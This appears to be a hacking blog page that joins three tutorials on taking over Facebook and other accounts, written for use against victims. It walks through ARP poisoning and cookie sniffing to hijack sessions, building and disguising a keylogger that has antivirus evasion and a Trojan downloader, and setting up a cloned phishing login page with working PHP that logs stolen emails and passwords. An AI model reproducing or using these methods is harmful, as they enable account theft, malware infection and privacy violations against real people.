ppppppplllllllllllllllllzzzzzzzzzzzzzzzzzz  like my facebook page
https://www.facebook.com/amazingspidyman?ref=hl
https://www.facebook.com/amazingspidyman?ref=hl
https://www.facebook.com/amazingspidyman?ref=hl

How to: Hack Any FB Account Using Cookie Stealing

Today in this article I am going to explain how to steal such cookies of different accounts using Cain – Abel and Wireshark software and how to use it to access our victim accounts.

First off I need to say that this will NOT steal anyones password unless they log in while you are monitoring them. This will however give you their cookies which you can use to steal there session and have full acess to their account. This will work for Facebook, a lot of emails (sorry no gmail), and just about any forum (except this one). If you are familiar with SSLstrip you can use this method to hijack any session (paypal, bank websites, any email, etc.)

Facebook Cookie Stealing And Session Hijacking

Wireshark Software to capture cookies:

Wireshark is the best free packet sniffer software available today. Actually, it was developed for making a network secure. But, the same software is now used by hackers to test for vulnerability and security loopholes in the network and to attack the network accordingly. Cookie stealing being one of the types of hacks implemented using this Wireshark software.

Requirements:

Cain and Abel : http://www.oxid.it/cain.html
Wireshark : http://www.wireshark.org/
Firefox 3 (or one compatable with add n edit) : http://www.oldapps.com/firefox.php?old_firefox=59
Add n Edit (cookie editor for firefox) : https://addons.mozilla.org/en-US/firefox/addon/add-n-edit-cookies/
Acess to the network with user you want to hack
Network traffic

Prerequisites: Download and install all above programs. To add “Add n Edit” to your browser just open firefox, go to tools, then click add-ons. you can drag and drop the program from wherever you saved it into the little box that popped up and install it from there.

Below, I have listed steps on how to capture Facebook and other accounts cookies. This will help you to know how Wireshark and Cain-Abel can be used to sniff packets and capture cookies.

First: Gain acess to the Network. Open networks or your own network would be easy but if you have a specific slave you want you should be able to gain acess using Backtrack.

Tip: use reaver to exploit WPS for WPA/WPA2 encryptions, WEPs are easy to crack given time and OPN means there is no password.

Second: Right click Cain and choose ‘run as administrator.’ on the top bar go to ‘configure’ and be sure to select your wireless card/adapter. now click where it says ‘Sniffer’ then this litte button towards the top left:

Next click any empty white box then the blue “+” symbol near the button you pressed just before. choose okay
should look like this:

These are all the devices it was able to detect.

Now we go to APR on the bottom bar. Once again click any empty white box then the blue cross. It’s easiest to just go one by one and choose all possibilities.

Now we have to poison them so we choose the little yellow hazard symbol towards the top left. should now look like this:

we are done here, just minimize Cain for now.

Third: Run wireshark as administrator. On the top bar choose ‘Capture’ then ‘Interfaces.’ Here you will have to choose your interface that is connected to the Network we are sniffing from. if you wait a few seconds you might see some traffic being collected as seen in my photo, just choose that interface b/c thats most likely it.

Wireshark will list and color-code all the traffic it sees for you. To make this simpler we can use the filter to only see the traffic we want, Type “http.cookie” in the filter. (Something to consider is to just filter to “http” and scroll through the entries looking for ones that start with the word “POST” this means that information was submitted to the webpage noted such as a username and a password! so if you see this just look through the details and you should see the info you want, most passwords will be hashed but use this site to decript them:http://www.md5decrypter.co.uk/ )

Here is an image:

You can either look through this information manually or use the search function to find what you want. In my case i want to hijack the session of a user on the forumfreerainbowtables.com so i will use the search function (press Ctrl+F, or go to edit -> search) and type in the information i know for sure will be in the entry. if your hijacking someones facebook put ‘facebook’ there. Most of the time to be safe i do not use the first entry i see b/c this will only work if the person is auto logged in, so just go down a few more until you see one you think will work (just use common sense).

What we need are the cookies. Here are what mine look like and how to get there. With practice you will be able to tell which cookies are used for logins and be able to limit failed attempts.

Copy the cookies as value and save them into a notepad (shown in pic above). I would suggest to seperate everywhere you see a “;” bc this suggests that is the begining of the next entry. The text to the left of the = is the name of the cookie and the text to the right is its value.

Final: Open up your firefox browser with Add n Edit enabled. You can get to your add ons by going to tools and they should all be listed in the drop down tab. First go to the website you are hijjacking the session from then open your cookie editor. Should look something like this:

The last thing to do is to change your cookies to match the ones you captured. If the cookies given to you by the site expire (like the ones in my picture do) you will have to delete them and add all the ones we captured earlier in. if they do not expire you can just edit them. Bottom line is all the cookies must match the cookies you captures in the earlier steps EXACTLY! Make sure you do not add any extras and that you did not miss anything. Also all fields must be filled in (Path and Domain as well as Name and Value). My path is “/” and my domain is “.freerainbowtables.com”
mine looks like this:

You are now done, Just close the cookie editor and reload the webpage. If done correctly with the correct cookies you should be logged in as the user you attacked!

So guys, I hope this
Facebook Cookie Stealing And Session Hijacking
will help you to hacking facebook as well as different types of account like hotmail yahoo etc by stealing their cookies. If you have any problem in above Facebook Cookie Stealing And Session Hijacking tutorial, please mention it in comments.

Please like our Facebook page @@[0:[0:1:https://www.facebook.com/amazingspidyman?ref=hl]] to stay updated about our articles and posts!

Hope you love our blog!

Thanks and Stay Tuned! :D

How to hack Facebook account Using keylogger

Hi friends! Its my new trick to tell you all how to hack any facebook account's password using keylogger. Its an interesting article though everybody wants to hack facebook's account in today's date. Simply, facebook hacking is not easy but by trying you can do anything. You have to be diligent in your job. Then after, you can succeed. So, become determined to hack any facebook account. Firstly, i will tell you a trick to hack it with keylogger. But be careful while doing this. I may request you all to take any IP address changing sofware while doing this.
Just follow the Steps to hack-

1> Download emissary keylogger from here(free)- http://www.mediafire.com/?rb47n0iaawj34id
2> Remember that you must have Microsoft Net Framework installed in your PC. This software is compulsory for any hack. Download it from here- http://www.microsoft.com/net/
3> Download and install both software on ur PC. After doing so, open emissary.exe


5>  Now, fill in your Gmail username and password in respective fields (You can create a gmail account that you're going to use only for keylogging). Enter the email address where you wanna receive facebook passwords. Choose a name for the server.exe file. You can set timer as you wish. This timer controls the time interval between two logs emails.
6. In the "Options" section you can see what this evil little buddy can do ;)

• Block AV Sites: Blocks Virus Scanning Websites on victim's computer
• Add to Start up: Adds to Startup via Registry
• Antis: Anubis, BitDefender, Kaspersky, Keyscrambler, Malwarebytes, NOD32, Norman, Ollydbg, Outpost, Wireshark
• Disable TaskManager: Disable TaskManager on victim's PC
• Disable Regedit: Disable's Regedit on victim's PC

7. Check "Trojan Downloader" to Download and Execute a Trojan on victim's PC. You can also create a fake error message and scare your victim, like:


8. After you're done, hit on "Build" and you will get server keylogger file created in current directory.

9. Now, to hack Facebook password, you have to send this server file to victim and make him install it on his computer. You can use Binder, Crypter or Fake Hacking Software to bind this server file with say any .mp3 file so that whenever victim runs mp3 file, server is automatically installed on his computer without his knowledge.

10. Now because this is a server.exe file you can't send it via email. Almost all email domains have security policy which does not allow sending .exe files. So to do this you need to compress the file with WinRar or upload it to Free File Storage Domains, like, Speedyshare.com, Ziddu.com 3gb free.com, etc.

11. Once the victim runs our sent keylogger file on his computer, it searches for all stored passwords and send you email containing all user-ids and passwords, like:


Now the victim's password is yours.... ENJOY!

Hacking FB by Phishing...Fake login page !!
I am gonna start my sharing by putting a basic tutorial on FB phishing which is highly in demand these days by newbies.

Disclaimer-: This tutorial is for educational and learning purpose only.I do not encourage internet users to try and use this or other hacking methods posted by me to do illegal activities online.If by any chance someone uses this information for any kind of cyber crime activities then i ( Atul Dwivedi) cant be held responsible by any means.

For making Phishing page for any site you need 3 types of files in common.They are

.Html file ( thats the fake page )
.Php file or any other action script page (for tracking the details that entered in page created by you)
.Txt file ( To save all the details in text format )

HOW TO MAKE FACEBOOK PHISHING PAGE

1. Open Facebook login page (make sure that the page is loaded completely) and right click and select view source or view source code option to see the source code of the loaded login page.

2. Select all ( CTR + A ) and copy all the code and paste it in notepad.

3. Then search(CTR + F) for the keyword action.You can see the code as given below.

action="https://www.facebook.com/login.php?login_attempt=1"

4. Just change the above code as mentioned below

action="pass.php"

after changing to pass.php (or anyname.php) just save it in the form facebook.html or (anyname.html). By finishing this step our phishing page is ready.Now we want to create script page for this phishing page.

5. For creating a php script,just copy the below php code into notepad and save in the format pass.php (name mentioned in action of our phishing page)
<?php
$fp = fopen("Passwords.htm", "a");
fwrite($fp, "Email:$_POST[email]\tPassword:$_POST[pass]");
echo "<HTML>
<head>
<FRAMESET cols=\"*\">
<FRAME SRC=\"http://www.facebook.com\">
</FRAMESET>";
?>
Note:‘http://www.facebook.com‘ is the redirection url,When victim will enter his/her email and password he will redirected to’http://www.facebook.com‘

6. By this step our PHP script is also ready,

7. Now host these 2 files

facebook.html
pass.php

in any of free hosting servers like ripway, drivehq ,110 mb ,000webhost.com, t35.com etc (or any other,you can just google the term "free hosting" ). Make sure that these 2 files are in same directory.

8. After hosting you will get a direct link to your phishing page,that is to your facebook html page , then just use this link to access or send phishing page.

9. When anyone tries to login through your phishing page a new html page with name password.html will be automatically created in your hosting directory with the password and username entered there.

10. Thus....you can own that person's Fb account